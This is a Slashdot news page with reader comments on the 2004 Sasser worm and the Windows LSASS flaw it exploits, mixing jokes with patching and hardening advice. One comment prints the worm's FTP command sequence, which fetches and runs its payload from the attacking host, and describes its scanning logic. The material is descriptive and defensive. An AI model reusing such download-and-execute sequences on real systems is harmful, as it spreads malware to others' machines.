×

Announcing: Slashdot Deals - Explore geek apps, games, gadgets and more. (what is this?)

Thank you!

We are sorry to see you leave - Beta is different and we value the time you took to try it out. Before you decide to go, please take a look at some value-adds for Beta and learn more about it. Thank you for reading Slashdot, and for making the site better!

New Windows Worm on the Loose

michael posted more than 10 years ago | from the batten-down-your-ports dept.

Security 622

Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."

Sorry! There are no comments related to the filter you selected.

ah... (5, Funny)

Anonymous Coward | more than 10 years ago | (#9028359)

the luxury of being behind a nat box with all ports off and not having to deal with such nonsense

Re:ah... (5, Funny)

Interruach (680347) | more than 10 years ago | (#9028414)

ahh, the luxury of the first box after the NAT being a linux proxy server that serves my entire internal network.

-- I see your nat box and raise you a proxy server.

Re:ah... (1, Funny)

Anonymous Coward | more than 10 years ago | (#9028571)

Ha, an IP Masqueraded Linux Firewall beats both (ip 10.0.0.1)! Bow before my geekdom!

Re:ah... (1, Funny)

Anonymous Coward | more than 10 years ago | (#9028637)

You wish. An OpenBSD box set up as a firewalling bridge between the Internet and the local network kicks all your asses.

Re:ah... (5, Insightful)

Anonymous Coward | more than 10 years ago | (#9028437)

the luxury of being behind a nat box with all ports off and not having to deal with such nonsense

Yeah... till your buddy comes over to play Counterstrike and plugs into your hub infecting your machine.

Re:ah... (1, Funny)

Anonymous Coward | more than 10 years ago | (#9028562)

must be hard acessing the net what with port 80 turned off eh? :)

FP! (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#9028364)

w00t

I Use X Windows (5, Funny)

craXORjack (726120) | more than 10 years ago | (#9028367)

Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?

What is this 'Windows Update' of which you speak?

Re:I Use X Windows (1, Informative)

Anonymous Coward | more than 10 years ago | (#9028392)

What is this 'Windows Update' of which you speak?


its started when you do

# apt-get update && apt-get dist-upgrade

Re:I Use X Windows (2, Insightful)

squall14716 (734306) | more than 10 years ago | (#9028417)

Actually, I use:
emerge -uD world
;)

Re:I Use X Windows (2, Interesting)

Anonymous Coward | more than 10 years ago | (#9028490)

Anyone coin a "Godwin's Law for Genoo Zealots" yet?

Re:I Use X Windows (3, Funny)

squall14716 (734306) | more than 10 years ago | (#9028517)

Hey! I'm not a zealot, I just have this much time on my hands.

Re:I Use X Windows (0)

Anonymous Coward | more than 10 years ago | (#9028396)

X Windows? never heard of that, but X Window [x.org] , i have heard of

Re:I Use X Windows (1)

craXORjack (726120) | more than 10 years ago | (#9028536)

You are just a MS fanboy trying to defend Microsoft's trademarked use of the word, but it never should have been granted as proven in the Lindows lawsuit because the term Windows is and always has been commonly used for any windowing environment.

Google search for "X Windows": 1,620,000 hits [google.com]
Google search for "X Window": 1,820,000 hits [google.com]

Re:I Use X Windows (2, Informative)

squall14716 (734306) | more than 10 years ago | (#9028627)

It's called X Window System, not X Windows. Calling someone an MS fanboy because they point this out is uncalled for. Speaking of which... there are MS fanboys? Are these people out of their minds?

Re:I Use X Windows (5, Funny)

temojen (678985) | more than 10 years ago | (#9028405)

I believe it's a cludgey microsoft variant of

"emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"

except that it requires you to reboot several times and repeatedly interact with it.

Re:I Use X Windows (0)

Anonymous Coward | more than 10 years ago | (#9028507)

While the reboot may take a minute or two, it's certainly not on the order of 4 hours...

Re:I Use X Windows (2, Funny)

temojen (678985) | more than 10 years ago | (#9028589)

But you can't use your computer while it's going either.

Re:I Use X Windows (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#9028636)

hahah are you stoned?

Re:I Use X Windows (1)

chosen_my_foot (677867) | more than 10 years ago | (#9028608)

I use Windows and I have used Gentoo. Windows update rarely requires more than a click on an "I accept" button, and one reboot. OTOH, I guess some people would rather wait a few hours for their updates in order to completely automate the system. *shrug*

Re:I Use X Windows (0)

Anonymous Coward | more than 10 years ago | (#9028649)

fuck! Do you google for that each time you want to update your machine?

Oh, lemme guess. You have typed it in so many times you know it from memory.

Re:I Use X Windows (1)

Three Headed Man (765841) | more than 10 years ago | (#9028482)

I just ran Windows update and there's no patch yet. The Redmond boys have yet to address this.

Re:I Use X Windows (5, Informative)

bamf (212) | more than 10 years ago | (#9028576)

You've probably already installed it, just look for KB835732 in your list of installed updates.

Mutex Trapping (5, Interesting)

Mr. Darl McBride (704524) | more than 10 years ago | (#9028369)

About the first thing any Windows program does is to attempt to acquire a mutex to see if the program is already running. In the case of this worm, that's "Jobaka3l." If that exists, the worm dies off without running.

Mutexes are named consistently enough under Windows that I wish somebody would make a program that simply caught all attempts at gaining a mutex and popped up a dialog window if the mutex hadn't been seen before. This would stop most any new software from running without first checking with the user. This is no good for a server of course, but ideal for a workstation.

This would also be great for catching spyware crap installs, as well as things like the RealPlayer toolbar that keeps popping up adverts by default. Simply tell the mutex checker to decline the requested mutex from then on and it would have the mutex always fail from then on -- then those programs could never be run again.

Re:Mutex Trapping (3, Interesting)

Mr. Darl McBride (704524) | more than 10 years ago | (#9028385)

For that matter, how hard would it be to restrict which programs are allowed to create files with runnable extensions without prompting?

Why can't we have something that protects the registry and pops up whenever something wants to go into software/microsoft/windows/run, /runonce, runonceex, etc? 3/4 of the stuff that goes in there, I end up ripping out later. It's dumb that it's so easy for programs to install things there.

Re:Mutex Trapping (5, Informative)

Anonymous Coward | more than 10 years ago | (#9028427)

You can set permissions in the registry per key.

Make it impossible to write to HKLM/software/microsoft/windows/currentversion/run

Re:Mutex Trapping (1)

Saint Aardvark (159009) | more than 10 years ago | (#9028444)

Cool! How?

Re:Mutex Trapping (5, Informative)

stef0x77 (529972) | more than 10 years ago | (#9028496)

Use regedt32.exe (which is an older incarnation of regedit), go to the key in question, choose Security | Permissions ... from the menu etc...

Re:Mutex Trapping (1)

Saint Aardvark (159009) | more than 10 years ago | (#9028530)

Coolness...thanks for the tip.

Re:Mutex Trapping (4, Informative)

cscx (541332) | more than 10 years ago | (#9028525)

Run "regedit", then right click any key, and select "Permissions" -- you get a standard NTFS permissions box to fiddle with at your leisure.

Note this only works on NT-based systems (e.g., WinXP)

Re:Mutex Trapping (5, Informative)

kyhwana (18093) | more than 10 years ago | (#9028519)

Err, Startup Monitor [mlin.net] does just that.
Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..

Re:Mutex Trapping (0, Redundant)

Mr. Darl McBride (704524) | more than 10 years ago | (#9028628)

Err, Startup Monitor does just that
Sexcellent! Thank you!

Re:Mutex Trapping (4, Informative)

Verteiron (224042) | more than 10 years ago | (#9028546)

It exists already. There are several, some free, some not, but the most useful (and free!) one I've found so far is the brand-new Spybot [spybotsd.info] TeaTimer. It's available with the newest release candidate. You can download that here [net-integration.net] (link at the bottom of the forum post). Just run Spybot SD, do the immunization and such, run the scan, then switch it to Advanced mode and activate the "resident protection". Bingo. Nothing will ever write itself into your startup, or install a BHO, or toolbar, or change your homepage, without your knowledge and permission. Bear in mind it's a release candidate and there may be bugs; I know the Teatimer sometimes shuts off when you run the main Spybot program, and you have to go activate it again. Other than that it seems to work like a charm.

Re:Mutex Trapping (0)

Anonymous Coward | more than 10 years ago | (#9028409)

In fact symantecs worm blocker does exactly this...looks for mutex names of spyware.

Re:Mutex Trapping (4, Informative)

The Raven (30575) | more than 10 years ago | (#9028412)

Toolbars and similar items would not be prevented by blocking mutex's as far as I know, because they don't create one. They run under the IE process.

However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.

Re:Mutex Trapping (3, Informative)

Joe U (443617) | more than 10 years ago | (#9028413)

Interesting concept, but many programs use lots of mutexes, and some don't use them at all.

Imagine running something complex like a database server. Dialog box fun.

The virus writers will just use something else, like a file, if people tracked by mutex.

Re:Mutex Trapping (1)

Mr. Darl McBride (704524) | more than 10 years ago | (#9028439)

Interesting concept, but many programs use lots of mutexes, and some don't use them at all.

Imagine running something complex like a database server. Dialog box fun.

Yeah. I guess with something like that, you could have accept/deny mutex, as well as accept/deny app. Then something like C:/SOME/PATH/TO/MSQL.EXE could be allowed to run unencumbered from then on if its MD5 hash hadn't changed.

Re:Mutex Trapping (2, Insightful)

SchnauzerGuy (647948) | more than 10 years ago | (#9028449)

Creating a mutex at startup is by no means universal, and in fact, I doubt that very common at all.

If there was a mutex checker/blocker program developed, you would just see worm authors switch to a different method of determining if their worm was already running, or randomize the mutex name.

Re:Mutex Trapping (0)

Anonymous Coward | more than 10 years ago | (#9028509)

Randomizing a mutex name really defeats the purpose of the mutex.

The concept behind using a mutex is to stop reentrancy (is that a real word?) in a cricital section across applications.

If you randomize it, you might as well take it out.

Re:Mutex Trapping (1)

Mr. Darl McBride (704524) | more than 10 years ago | (#9028607)

Randomizing a mutex name really defeats the purpose of the mutex.

The concept behind using a mutex is to stop reentrancy (is that a real word?) in a cricital section across applications.

You could certainly randomize the generation scheme, however. A hash on the system name and the date would limit additional infections to one per day, for example.

Re:Mutex Trapping (2, Insightful)

eyeye (653962) | more than 10 years ago | (#9028470)

Many modern firewalls allready flag up applications running and allow you to block them.

They dont rely on mutexes either.

Troll alert! (0)

Anonymous Coward | more than 10 years ago | (#9028529)

Worms and spyware will simply use a home-made mutex system if we start to block the windows one.

In general, the idea of catching windows library calls is worthless, unless the library call is absolutely necessary to the worm and the functionality cannot be done in any other way (which is not the case in Mr. Darl McBride's example).

Re:Mutex Trapping (2, Insightful)

Mr. Darl McBride (704524) | more than 10 years ago | (#9028585)

Worms and spyware will simply use a home-made mutex system if we start to block the windows one.

In general, the idea of catching windows library calls is worthless, unless the library call is absolutely necessary to the worm and the functionality cannot be done in any other way (which is not the case in Mr. Darl McBride's example).

Of course. They're going to work around any countermeasure if it goes into popular use. Once upon a time, all programs were allowed to write to the entire filesystem. Remember bootsector viruses? They finally reworked the filesystem and device layer so that user code couldn't touch that area anymore, and those kinds of infections went away. Remember Word macro viruses? New versions of Office warn you about macros that want to run on opening a doc, and those are rapidly vanishing as well.

Similarly, short of reworking the way programs are installed and authorized, nothing is going to work as the long-term solution. That's why Longhorn and the .NET execution framework thange these things exactly.

The mutex check is merely one option which doesn't seem to be in wide-spread use yet. I'm sure there are many others, and yes -- any of them would eventually get worked around for new viruses and trojans.

Huh? (5, Funny)

grub (11606) | more than 10 years ago | (#9028371)


A new worm?
May 01 07:59:49.306654 rule 0/0(match): block in on dc0: xx.xx.xx.xx:xxxx > yy.yy.yy.yy:yyyy: S 2881286568:2881286568(0) win 32640 (DF)
Oh, there it is.

THEY COMMETH FROM MINE BUNGHOLE!!! (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#9028375)

de worms de worms!!!

Removal Instructions (5, Informative)

modifried (605582) | more than 10 years ago | (#9028381)

For anyone already infected, Microsoft has manual removal instructions for the worm, located here:

http://www.microsoft.com/security/incident/sasser. asp [microsoft.com]

Re:Removal Instructions (2, Interesting)

hound3000 (238628) | more than 10 years ago | (#9028560)

For anyone already infected, Microsoft has manual removal instructions for the worm, located here: http://www.microsoft.com/security/incident/sasser. asp [microsoft.com]

Looks like they just cut and pasted that page. Found in source code html...
<TITLE>What You Should Know About the Blaster Worm and Its Variants</TITLE>

<META NAME="Description" CONTENT="The W32.Blaster.Worm and its variants exploits a security issue that was addressed by Microsoft Security Bulletin MS03-026. This worm also has the potential to exploit a similar issue that is addressed by Microsoft Security Bulletin MS03-039. Learn how you can protect yourself from this worm."/>

ah Nice, more work =) (5, Funny)

Quazion (237706) | more than 10 years ago | (#9028382)

Atleast for me as the local consumer support guy.

Thanks Microsoft.

HAHA (5, Funny)

D-Cypell (446534) | more than 10 years ago | (#9028386)

A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!

The add server must be based on Microsoft's new Irony.NET framework!

Goodness? (0)

Anonymous Coward | more than 10 years ago | (#9028387)

Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?

I think all good Windows-using Slashdotters should have threw their windows machines off a balcony long... long ago.

You must be an american (5, Funny)

empaler (130732) | more than 10 years ago | (#9028630)

Only consumer whores and other types of idiots choose to toss out the computer instead of just wiping the hard drive and installing something else.

Blaster-style? Uh-oh. (3, Interesting)

squall14716 (734306) | more than 10 years ago | (#9028401)

Since most users don't have a firewall and don't use Windows Update, I wonder how many machines will be infected by Monday? Seriously now, it's getting old now. Good thing I'm using Linux now.

Re:Blaster-style? Uh-oh. (0)

Anonymous Coward | more than 10 years ago | (#9028487)

No, now, what's really getting old now is the overuse of the word now, now. :\

Re:Blaster-style? Uh-oh. (1)

squall14716 (734306) | more than 10 years ago | (#9028533)

I type it up, delete half of it and type something else. Don't make fun of my methods. :(

Re:Blaster-style? Uh-oh. (4, Interesting)

FractusMan (711004) | more than 10 years ago | (#9028527)

From the call volume here at work (an ISP), I'd say a LOT. We went from 0 to a couple hundred in queue in an hour. That was last night. Today, it's still as strong.

stay tuned (1, Funny)

Anonymous Coward | more than 10 years ago | (#9028404)

Fox New's official death toll caused by this new exploit stands at zero, but that can change any second now. Find out how to save yourself, tonight after the weather...

already feeling it on college campuses (0)

Anonymous Coward | more than 10 years ago | (#9028407)

at my university (geaux tigers), we're already feeling the effects. students in the dorms dont patch their computers and they wonder why they get viruses. we send out frequent emails reminding them to patch their computers but they fail to realize it. only if they would use linux......:)

consider the jihad (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#9028420)

Ever notice the "beat the rush and see it early" link at the top of slashdot when a new story is about to come out?

Sounds good, doesn't it? To be able to view the pages linked to in the article before the tens of thousands of other slashbots click to view them.

Did it ever occur to you that you're taking part in cyber-terrorism?

That's right: Slashdot's editors are cyber-terrorists. They coordinate a DOS against small websites, and they attempt to collect moeny from people who wish to be spared the effects of said DOS. Terrorism, plain and simple.

You can fight this and other crimes by slashdot's editors by joining anti-slash [anti-slash.org] . Anti-slash is committed to forcing the editors to own up to their numerous crimes against the geek community. Until our demands are met, we will relentlessly discredit them as a news service through trolling and other means.

Also, props to poopbot and the alan thicke troll. We remember your accomplishments.

In sacred jihad,

jihadi_31337

| _ __ | |
_) |_|_)__/_| |
(_) o

Visit Windows Update? (5, Funny)

Anonymous Coward | more than 10 years ago | (#9028421)

No need, I receive all the Windows critical updates by email. I don't know how I got subscribed to that mailing list, but it's damn convenient.

Dang... (4, Funny)

kennylives (27274) | more than 10 years ago | (#9028428)

I have a Mac, you insensitive clod...

Re:Dang... (4, Funny)

skinfitz (564041) | more than 10 years ago | (#9028549)

Well look on the bright side - worms and viruses are the only things that you have less of than games.

Re:Dang... (0)

Anonymous Coward | more than 10 years ago | (#9028619)

Awww, now that's just low...

Security Update Dates (5, Insightful)

TheUnFounded (731123) | more than 10 years ago | (#9028435)

You know, normally these updates are available a good 3 or 4 months before the worm becomes available. This one was updated about 3 days ago. And MS claims to be beefing up their security efforts. ...

YA Windows-only software title (5, Funny)

Anonymous Coward | more than 10 years ago | (#9028441)

In light of this, would someone please explain why I would ever want a Mac? None of the really good viruses or worms are ever ported to it, no matter how successful they are!

Why use windows update? (1)

BlankTim (241617) | more than 10 years ago | (#9028448)

This is either a *really* old issue and I've already patched for it, or it's so new MS doesn't have a patch for it yet.

Either way, I don't see anything about it on the windows update site.

Re:Why use windows update? (3, Informative)

kyhwana (18093) | more than 10 years ago | (#9028547)

The patches were released on the 13th of April, there were four patches, of which, put togeather, they patch 20 different vunerabilities.

Linux is vunerable too (The anti-anti-windows FUD) (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#9028459)

Remember:

1. Linux isn't as good as Windows, Windows has more accountability and support.

2. If Linux was used as much as Windows then Viruses would be as common, instead of incredable rare.

3. Windows is cheaper then Linux even though Linux is free. It's a TCO type of thing.

4. Gimp sucks compared to Photoshop.

5. Open source is insecure by default. Only by hidding your secrets are they kept safe.

6. IE is better then Firefox because my kids can play shockwave games on Disney.com

7. MS has Exchange, Linux doesn't.

8. OO.org sucks compared the usability of Office

9. Linux isn't ready for the Desktop.

10. Grandma can't install Linux.

11. Can't play Everquest on Linux.

12. Users are the problem, Not Microsoft.

(HEY STOP!!, never mind that worm behind the curtain..)

Rinse.. repeat... Best applied bi-weekly or whenever a new worms strikes, which ever comes first. (about a 50-50 chance of either nowadays.)

But... it does! (0, Offtopic)

NSash (711724) | more than 10 years ago | (#9028552)

4. Gimp sucks compared to Photoshop.

Ah, come on now. I'm as friendly to OS as anyone else, but you're just fooling yourself on this one.

Where's Panda? (2, Informative)

RazorX90 (700941) | more than 10 years ago | (#9028465)

More information at Computer Associates, F-Secure, Symantec and McAfee.

Where's Panda [pandasoftware.com] in that list? Personally I prefer Panda over those.

Re:Where's Panda? (1)

LordK3nn3th (715352) | more than 10 years ago | (#9028659)

*sings* Computer Antivirus....Panda!

Loose not lose (5, Funny)

Brian Dennehy (698379) | more than 10 years ago | (#9028466)

I'm impressed that they got the headline right!

No brainer (0, Flamebait)

this takes too long (761596) | more than 10 years ago | (#9028473)

Ya ooo what a gigantic problem.. Every pc user with a brain should have a firewall and anti virus sofware running. If they havent learned yet they deserve to be infected. Heres the extremly complicated solution: Auto update everyday.

A disturbing trend... (0)

Anonymous Coward | more than 10 years ago | (#9028474)

The hang time between release of information about an exploit and the release of viruses taking advantage of that exploit is going down. It used to be that most worms were based on bugs that were known and patched months or years ago. In the past few months there have been several worms based on bugs that were fixed only days or weeks before. That makes it much more important to keep up to date with patches than it has been historically.

Windows XP SP2 should mitigate this somewhat, since it will tell a lot more people to update a lot more regularly, plus it comes with a decent firewall. The news that it is delayed is unfortunate to say the least.

Same old, same old.... (4, Insightful)

gnuman99 (746007) | more than 10 years ago | (#9028479)

Same old news about another worm. Nothing to see here, move along.

Seriously, hasn't MS learnt anything about the Internet yet? Why do they keep insisting to keep all of these ports open all the time? Why so many services running out of the box? Why can't people even close some of the listening ports?

If MS was any serious about security, they would have all ports closed be default. Or at least have a possiblity to closing them down during install.

Re:Same old, same old.... (0)

Anonymous Coward | more than 10 years ago | (#9028534)

There isn't much you can do to fix default configurations if you only release a new version every 5 years or so.

I beleive the Server 2003 does do the "minimal" route towards security ala Linux/Unix.

Of course this has a expected side effect of making 2003 harder to setup then 2000, but it's easy to mask that issue with new features.

Personally, I happy they do anything to make Worms less common, then my ping times/connectivity with quake3 and ut2004 wouldn't be so bad.

Re:Same old, same old.... (2, Insightful)

Anonymous Coward | more than 10 years ago | (#9028638)

When the first serious Windows worm striked,

- users could have asked for their money back,
- companies could have switched away from Windows en masse,
- government could have banned using Windows in their offices,
- there could have been a class-action lawsuit for gross negligence.

To Microsoft's surprise and delight, none of this happened. That's why we're seeing a 379th worm today.

How it works (5, Informative)

mrneutron (61365) | more than 10 years ago | (#9028493)

It infects a 2000 or XP box via the LSASS (MS04-011) exploit, and opens a shell on port 9996.

It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):

open XXX.XXX.XXX.XXX 5554

anonymous

user

bin

get XXXXX_up.exe

bye

XXXXX_up.exe

If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:

The IP addresses generated by the worm are distributed as follows:

50% are completely random

25% have the same first octet as the IP

address of the infected host

25% have the same first and second octet as the IP address of the infected host.

The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.

See:

  • http://securityresponse.symantec.com/avcenter/ve nc/data/w32.sasser.worm.html

Unoptimized algoritm... (2, Insightful)

Henk Poley (308046) | more than 10 years ago | (#9028563)

Don't these worm writers learn [berkeley.edu] anything?

Windows update doesn't work with illegal copies (0)

Anonymous Coward | more than 10 years ago | (#9028498)

So I used Microsoft Baseline Security Analyzer to get my patches.

Re:Windows update doesn't work with illegal copies (0)

Anonymous Coward | more than 10 years ago | (#9028566)

What a surprise, Microsoft puts their own revenues ahead of the general welfare of the Internet. I never saw that coming.

They should at least allow the critical security updates to be downloaded, no matter what. Then again, since Windows' has such Swiss cheese, Mickey Mouse security, nearly every update is a fucking critical security update.

Still, I fail to see who Microsoft thinks they're punishing by not allowing illegal copies to work with Windows Update. Hell, probably 80% of the Joe Sixpacks who buy PCs and own legal copies of Windows don't use Windows Update.

Dammit... (3, Interesting)

Saint Aardvark (159009) | more than 10 years ago | (#9028503)

I want a tarpit option for FreeBSD's ipfw, the same way there is for Linux. It'd be nice to do something to slow this thing down...not that it's easy to tell this worm apart from everything else cluttering up my firewall logs.

This is news? (1, Funny)

bcmm (768152) | more than 10 years ago | (#9028505)

Hmm... a new windows worm, exploiting a documented flaw? Never!

Whats new?

Shocking! (0, Troll)

focitrixilous P (690813) | more than 10 years ago | (#9028513)

Slashdot continues it's trend of releasing news that will shake your beliefs to the core! I thought for sure the previous worm was the last possible one!

This close to removing win2k... (3, Interesting)

brendanoconnor (584099) | more than 10 years ago | (#9028520)

Currently I'm running win2k on my main desktop fully patched, so this little problem doesn't really hurt me per say. With all the patches in place, my computer does some of the following things.

1) IE won't work (joking aside it just doesn't work at all). This happened a long time ago, so I switched to mozilla. I thanks ms for this cause moz. owns.

2) Add/Remove programs, I can no longer see the text to describe the program install. It's all grey. An icon shows, so I can uninstall that way. Its not the colo scheme either, I tried MS default and it still didn't work.

3) I was having problems with this latest worm, but patching fixed everything, so now we wait to see what broke.

All and all I'm getting extremely close to wiping the HDD, and dual booting Slackware Linux (which has been on my laptop for over a year and I love it) and win98se for games. All the backups are current, and I'm waiting for the next problem to make the system more unsuable. If I wasn't so damn lazy, this would of been done sooner.

Brendan

Re:This close to removing win2k... (1)

nazsco (695026) | more than 10 years ago | (#9028572)

>> and win98se for games

Bochs [sourceforge.net] for the old dos games, and Wine [winehq.com] for new ones (like, counter strike or warcraft 3 --ok, not so *new* ones) and you're free of the windows 98 price tag and dual boot

Help the poor bastards (5, Funny)

nazsco (695026) | more than 10 years ago | (#9028535)

The worm seems to install a ftp server on infected machines. So, wouldn't it be nice to have every box that detects a connection on port 554, reply with an upload of a new wallpaper to the infected windows box with some message like "install a firewall, moron"

I consider it a public service. Maybe you can even deduct the bandwith for the upload from you tax.

Oh the irony (1)

BillLeeLee (629420) | more than 10 years ago | (#9028542)

I had updated Windows XP except for whatever patch it was for this security hole because I had heard it caused problems. Then of course, Sasser hits and targets the security hole that I didn't patch for.

Damned if you do, damned if you don't.

I'm rebooting into Linux. Screw you Windows.

Re:Oh the irony (1)

Saint Aardvark (159009) | more than 10 years ago | (#9028614)

I got lucky on this one. There was one machine at work where the patch caused problems; since it was a license server, I had to remove it. While I was trying to find a way to have my patch and a working machine, the power supply and/or motherboard died. New machine, new install of 2K, and all the patches.

Days like this... (5, Funny)

C0rinthian (770164) | more than 10 years ago | (#9028554)

I REALLY hate working dial-up tech support.
(ring)
sigh....

Re:Days like this... (0, Redundant)

DarkAce911 (245282) | more than 10 years ago | (#9028591)

Monday is going to suck if this gets inside our firewall at work. This is the patch we did not push due to it causes 100% processor useage in some machines(MS04-11). Oh well, I am not going in to work this weekend, this worm will have all weekend to grow.

DarkAce911

Re:Days like this... (1)

Saint Aardvark (159009) | more than 10 years ago | (#9028598)

Oh god, I'm sorry. Used to work Saturdays too. My sincere sympathies.

A little late this week (0)

Anonymous Coward | more than 10 years ago | (#9028556)

Usually these happen on Thursday.

some important points (4, Informative)

R_V_Winkle (186128) | more than 10 years ago | (#9028578)

In addition to TCP 1025, the following ports are vulnerable to the LSASS exploit: TCP 135, 139, 445, and 593. UDP 135, 137, 138, and 445.

Sasser generates traffic on TCP ports 445, 5554 and 9996.

The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:

http://www.microsoft.com/technet/security/bullet in /MS04-011.mspx

Once again... (0)

Anonymous Coward | more than 10 years ago | (#9028602)

...Mac users worldwide pause, yawn/chuckle, and resume being productive on their machines instead of patching holes or manually yanking out already-present malware.

Windows update freaking out! (5, Funny)

nazsco (695026) | more than 10 years ago | (#9028616)

after reading this on the /. front page, i runned the windows update, that i don't visit for more than a year...

and after some time, a windows pops up with the text:
"The software you are instaling has not passed the Windows Logo testing to verify its compatibility with Windows XP. bla bla bla"
"This software will *not be instaled*. Contact your system administrator."

Ok, so i contact myself, and wonders what the hell?!?

I just give M$ a lot of information about the operating system that i'm running... they wrote the frign thing, and even so, they don't know what will run in it, or what will pass their own crap compatibility verification!

but well, that's it... i just click "OK" --the only button-- and see the same windows appears 3 times more... and blissfuly keep my ignorance of what's going on with the instalation.

I can verify this. (0)

Anonymous Coward | more than 10 years ago | (#9028622)

424 attempts in my logs since April 29. All coming through port 1025, mostly from Asian boxes.

That's funny. (2, Interesting)

LordK3nn3th (715352) | more than 10 years ago | (#9028642)

Speaking of worms, how easily could worms spread if it were Linux that was popular and not windows?

I know linux is more secure, especially because of the multi-user system where root is only used for special reasons, and that many windows programs are integrated in the OS (IE, Outlook...), but how feasible WOULD it be to make worms for Linux? I really don't know. I do use Linux, and I love it. I only boot into windows for certain things such as Battlefield 1942...

Well done, submitter! (5, Funny)

6Yankee (597075) | more than 10 years ago | (#9028643)

How refreshing. A Slashdot article about a worm exploiting Windows, without the usual childish jibes. Or FUD. Or spelling mistakes. Well done, Dynamoo!

Of course, then came the comments... :-)

but surely (1)

Anonymous Coward | more than 10 years ago | (#9028656)

Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?
Why would they need to? A good Windows user is a dead Windows user.
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?